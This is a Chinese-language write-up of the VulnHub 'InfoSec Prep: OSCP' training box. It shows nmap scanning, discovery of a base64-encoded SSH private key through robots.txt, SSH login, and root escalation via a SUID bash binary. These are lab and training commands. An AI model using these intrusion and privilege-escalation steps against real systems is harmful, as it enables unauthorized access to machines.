vulnhub oscp

标签：bin core18 2829 1439 usr snap oscp vulnhub

信息搜集

首先探测内网存活主机

nmap -sP 192.168.19.128/24

发现存活主机192168.19.140,然后扫描开放端口

nmap -p- 192.168.19.140

结果如下

22/tcp    open  ssh
80/tcp    open  http
33060/tcp open  mysqlx

这个mysqlx端口肯定是有说法的.访问80端口

渗透

发现下面的一段话
Heya! Welcome to the hunt.
In order to enter the give away, you must obtain the root flag located in /root/. Once you’ve obtained the flag, message the TryHarder bot with the command !flag <insert flag>. It will then validate the flag for verification. Should it be incorrect, it will let you know. If it’s correct, you will be given a new role on the server where you can chat with others in a private channel. Once you’ve received the role you are entered into the give away!
You must be a member of the server in order to use the command above.
For those downloading this box off vulnhub at a later time, the command above will no longer be available.
Oh yea! Almost forgot the only user on this box is “oscp”.
A big thank you to Offensive Security for providing the voucher.
Happy Hunting
-FalconSpy & InfoSec Prep Discord Server
上面的内容中包含有效信息:用户名为oscp,只有这一个用户,需要获得到root下的flag,然后通过!flag \<insert flag\>命令创建一个新的用户完成本次任务
使用whatweb进行指纹识别

whatweb -v 192.168.19.140

发现是WordPress 5.4.2,使用wpscan扫,没扫出来.使用dirsearch扫,发现有robots.txt文件.我们访问发现内容如下:
User-Agent: *
Disallow: /secret.txt
访问secret.txt,发现是经过base64进行编码了的,解码内容如下

是一个ssh私钥文件.我们将其写入kali.注意:ssh相关的权限控制比较严格,通常私钥600,仅所有者可读写;公钥644,所有者读写,其他人可读;存储秘钥的.ssh目录为700,仅所有者可读写执行.
我们修改权限为600,然后ssh连接,并用pty升级bash

ssh -i key [email protected]
python3 -c 'import pty;pty.spawn("/bin/bash")'

提权

发现当前目录有一个叫ip的文件,查看发现内容如下

#!/bin/sh
cp /etc/issue-standard /etc/issue
/usr/local/bin/get-ip-address >> /etc/issue

可以看出是一个bash脚本,查看脚本权限

-rwxr-xr-x 1 root root 88 Jul  9  2020 ip

发现这东西挺有说法的,能够让普通用户以root权限去执行脚本,然而不能写,没啥用.
尝试使用suid提权

find / -user root -perm -4000 -print 2>/dev/null

结果如下

/snap/core22/1439/usr/bin/chfn
/snap/core22/1439/usr/bin/chsh
/snap/core22/1439/usr/bin/gpasswd
/snap/core22/1439/usr/bin/mount
/snap/core22/1439/usr/bin/newgrp
/snap/core22/1439/usr/bin/passwd
/snap/core22/1439/usr/bin/su
/snap/core22/1439/usr/bin/sudo
/snap/core22/1439/usr/bin/umount
/snap/core22/1439/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core22/1439/usr/lib/openssh/ssh-keysign
/snap/core22/1439/usr/libexec/polkit-agent-helper-1
/snap/snapd/21759/usr/lib/snapd/snap-confine
/snap/core18/2829/bin/mount
/snap/core18/2829/bin/ping
/snap/core18/2829/bin/su
/snap/core18/2829/bin/umount
/snap/core18/2829/usr/bin/chfn
/snap/core18/2829/usr/bin/chsh
/snap/core18/2829/usr/bin/gpasswd
/snap/core18/2829/usr/bin/newgrp
/snap/core18/2829/usr/bin/passwd
/snap/core18/2829/usr/bin/sudo
/snap/core18/2829/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/2829/usr/lib/openssh/ssh-keysign
/snap/core18/1754/bin/mount
/snap/core18/1754/bin/ping
/snap/core18/1754/bin/su
/snap/core18/1754/bin/umount
/snap/core18/1754/usr/bin/chfn
/snap/core18/1754/usr/bin/chsh
/snap/core18/1754/usr/bin/gpasswd
/snap/core18/1754/usr/bin/newgrp
/snap/core18/1754/usr/bin/passwd
/snap/core18/1754/usr/bin/sudo
/snap/core18/1754/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1754/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/fusermount
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/bash
/usr/bin/pkexec
/usr/bin/umount
/usr/bin/chsh
/usr/bin/su

我们发现/usr/bin/bash有suid位,执行命令

/usr/bin/bash -p

能够以管理员身份得到一个shell,实现提权,得到flag

标签：bin,core18,2829,1439,usr,snap,oscp,vulnhub
From： https://www.cnblogs.com/meraklbz/p/18348335

信息搜集

渗透

提权

相关文章

赞助商

阅读排行